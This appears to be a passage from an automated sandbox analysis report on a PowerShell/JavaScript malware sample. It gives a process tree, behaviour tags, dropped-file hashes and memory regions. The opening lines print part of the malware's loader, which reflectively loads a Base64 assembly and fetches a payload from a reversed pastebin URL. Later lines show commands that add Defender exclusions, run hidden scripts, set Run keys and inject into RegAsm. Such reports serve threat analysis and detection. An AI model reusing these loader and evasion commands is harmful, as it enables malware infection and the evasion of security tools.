(Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:324
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4312
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3160
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:4076
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:2484
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2184
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4004
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4604
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4768
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:812
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\sxodr.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5040
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1648
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3976
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:772
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2240
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:624
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2348
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4892
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3736
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2924
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4052
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:4448
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:2128
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2972
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js"
                  5⤵
                    PID:116

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1

            Filesize

            431B

            MD5

            41808e4dff98745ca29df11645e71782

            SHA1

            28a2a6c3f0568927c68cca99b62b164488370f54

            SHA256

            a40e183a9b3b6edb3453f3ce54feba13bbfd2f1364237df1a151008f64f032b1

            SHA512

            4d3cee52335bc32e7864c3f191f95d1ac260d35216abdf67b31b67c98d59d7b18ca98a2d8e38c1543bca40689c4e518e3c35fa6207e61bc51bc18f48754840c4

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1

            Filesize

            426B

            MD5

            ba1104392c84008e21a6640f631a60e6

            SHA1

            0f702084902b026ed660b51db6432758b03bad7a

            SHA256

            0f572cc2807b65c5b05abcd8032a1c6cf1f8360116362678da249b23037a7c89

            SHA512

            9f82120f2444a3a2e10f2f25afd21633132a615f103f932a24cb07cd1c3d4691df3e4903d9dff25653e37acf5b5aa9c66b2ba6e72b02f1370fc37bee4f804a66

          • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\sxodr.ps1

            Filesize

            225KB

            MD5

            96e48a88523f9505cd66b7be1e1bad81

            SHA1

            7a626d4e1a451e24692ed0b419f917cb3dd2e8ca

            SHA256

            a4f366899e0f82d1ceeb018bf52ffbda68a9412998c0fbc36ec2a75806cf5626

            SHA512

            0b7759a86fa6a43ae6b2212d542174a6f552027e94e1a71e009b094f748bc16b6b03b0a98f31a4cbe919949edda6d8499c16b490d93144bd809d3659a18f9584

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            1c20a583d307455f113ba9b0f8393e9e

            SHA1

            c2526f856b88553ab97dd99d53aa8e5e9d8a353f

            SHA256

            17b5cae30fcc407e92e6208371ad3d9757fc61e099d54e74d2d80d133e81ec75

            SHA512

            353f8529bad9cb6ffc4aac4a36ceb1c1afd478c6e1e475e29229e5f710395f1a795890245141c77873541ef3fcde26fca1eb35341a0743d153c890c53bef7762

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            5caad758326454b5788ec35315c4c304

            SHA1

            3aef8dba8042662a7fcf97e51047dc636b4d4724

            SHA256

            83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

            SHA512

            4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            5161e9d6b9b677b7af6e5bb11a361b91

            SHA1

            9fe0a04c2bb86467b9aa584c78db4fc7eccfdd42

            SHA256

            addb0aa038e121d21d7b4bd4ba49316c05294a582cb430eb37ce3925324bd3d0

            SHA512

            95b4a85b4240145d35f1f14bc07ee87b597d484935599f898074be16a7bfcc6fdb36e31e5afedac1c83bdbcbf402c40a3573f2b3512ba521f3ad29fd503f7749

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            948B

            MD5

            ca885ce2b7a4be34acd565a65ea19984

            SHA1

            8c5d9a4507aab2ef743cd08cee8d0dff7a43bb99

            SHA256

            c22434ffab6b0df6d60e3f56e0f87e550abd72566622de3d7458ba027ed7378c

            SHA512

            1cba207f47a009cbc0fdf2a6cf13ef8215e7b28c7d0912006238db9c91dc23c0528e3ba87e02bddc6c7588b346954d4f9bbf426d80159d163318a8b63cc5cebe

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            d8b9a260789a22d72263ef3bb119108c

            SHA1

            376a9bd48726f422679f2cd65003442c0b6f6dd5

            SHA256

            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

            SHA512

            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            d8aa46519ec94eeb437899c911093264

            SHA1

            a9e50ca174284614280683ec067c26f9b25c91f4

            SHA256

            0fa73f0afd84e94684b7e170aca221854e015e4d375d8e76e13675c94b4df2e9

            SHA512

            037f1e61b996cd06d2e394cd56e6a2f2bf2c1903ca35dbe21021a1d394298b8954acec61780e9c7330675992e8749888f52cf352d9715533312b710b30723909

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            a68fcc3482ebb381cd7eb80d4dfc7ac9

            SHA1

            68f694b1b7999996678244d8ef9d95f520ec2e39

            SHA256

            1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

            SHA512

            a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            4bacc69236cb4a4b9ec092130adcbee0

            SHA1

            a918767842fcd48e611729d471eeec1f7ba6f819

            SHA256

            c8330d7880df7f49c106d51aa3444f71b64bc563998e39786491a669196a771f

            SHA512

            0a7db3521d33ae0bebb0ccf2d23647961a68c67aade700769dea338d47a5823fa0b6c4dd70aa2892c09bc166e3211421e82ac4fdcb3bd17ceb0be480e6c2cabb

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            3ca75313de7ebb3a430fcb67070ab281

            SHA1

            58e09f7d879477b8b9b0ba59f13cfe749938779e

            SHA256

            e39d9c0a968c541855236d785f2c33a24d1efab18790a543bc553108197c879b

            SHA512

            4407de19d7637417680ec73d86ab57dfac98006a68338c45ec6cb69cb4a72b73b299c0b5cda88ce12f8a65c4e068f4fecf100d1cba1e8ba41429c258b62ca5e1

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            1536159346e9a2061e905bb38ac9fd35

            SHA1

            eff17db4721dc0add117ed399b839130d27675d4

            SHA256

            6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

            SHA512

            fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            693baf43e3d5fefa0883380c7a77c69a

            SHA1

            f3e6115432504e8bd401d8c0ff2da43e708707e5

            SHA256

            27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

            SHA512

            29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Temp\DLL01.txt

            Filesize

            31B

            MD5

            44933644bd65016bca7b39c9ea78c1ad

            SHA1

            84317b9ee130b7b6ba0cb25fda31527453352bbf

            SHA256

            de2f713cac74b61b89d400ab388452bb948e6b709a41203d4591a57b7272d92b

            SHA512

            9692ebf88ed5d844bfb2e6c77addd32116ca49eca6e1a66ba1b67d06cd29ed66d4f50a46fb7e8c947f22d0b61fb42a2f1d4fd8865e79c1729c101cdadff3e442

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1mnleluv.20t.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\dll02.txt

            Filesize

            58KB

            MD5

            f91fc6d798370c2babe3d901ca52f575

            SHA1

            cae7d51cfb341acee678bdf8fdc4f98c50a778ce

            SHA256

            daf05c9c7d1123926265600e912688af5739c121002016933a2da7a249a04983

            SHA512

            0156e7dbd1fd87b3c62dbccd3afd0ee3491ef2ba24c7f173d728d157300bbd00199e71c0f95f715f8cacb8ba7ac209575dc6012dd5b296fafa7e6bb92d71a0cf

          • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

            Filesize

            940B

            MD5

            9110f75846a63e3f725e0eb8d69af45d

            SHA1

            78f90e920df462a7f985271c5f34bd4d9d977173

            SHA256

            1d00a0dd1477175d0da38ec7e81a7c80d84926fbbced3d924d3f6b1b6019360d

            SHA512

            79568106d03dfa161ab861219c02c7b01c8c11209e20f8773cea44dbc437d2ecad8b2f0ca29e5b43658124a5e770b0968448bf664672d0bbd9d0383555b1756e

          • C:\Users\Admin\AppData\Roaming\pesister.ps1

            Filesize

            231B

            MD5

            0224885357e593348a5cacba35047fad

            SHA1

            5dfb0753f6b35754490989bfd7d00050dff8f3e9

            SHA256

            aa5315006ff463970d8369cb1d4971cdb7ba58e890b092e572a35d3b16f888ba

            SHA512

            44a5ede23d5b755f893f1a792f6e7a2b2b6345909b4cb63850eb466f71ad9d6c39a80aea9417a549ca5078891ae4ab7847b44078d74a5a947c0f452979dac01a

          • memory/1456-37-0x000001E6570C0000-0x000001E6570CA000-memory.dmp

            Filesize

            40KB

          • memory/1740-6-0x0000026CF2CF0000-0x0000026CF2D12000-memory.dmp

            Filesize

            136KB

          • memory/1740-117-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1740-11-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1740-12-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1740-65-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1740-0-0x00007FFA81103000-0x00007FFA81105000-memory.dmp

            Filesize

            8KB

          • memory/1740-64-0x00007FFA81103000-0x00007FFA81105000-memory.dmp

            Filesize

            8KB

          • memory/2972-140-0x0000000000400000-0x0000000000410000-memory.dmp

            Filesize

            64KB

          • memory/2972-160-0x0000000005DB0000-0x0000000005DBA000-memory.dmp

            Filesize

            40KB

          • memory/2972-172-0x00000000086D0000-0x00000000086DE000-memory.dmp

            Filesize

            56KB

          • memory/2972-159-0x0000000005DE0000-0x0000000005E72000-memory.dmp

            Filesize

            584KB

          • memory/2972-156-0x0000000005BD0000-0x0000000005C36000-memory.dmp

            Filesize

            408KB

          • memory/2972-155-0x0000000006080000-0x0000000006624000-memory.dmp

            Filesize

            5.6MB

          • memory/2972-142-0x0000000005880000-0x000000000591C000-memory.dmp

            Filesize

            624KB

          • memory/3068-129-0x000001AFC3E30000-0x000001AFC3E3A000-memory.dmp

            Filesize

            40KB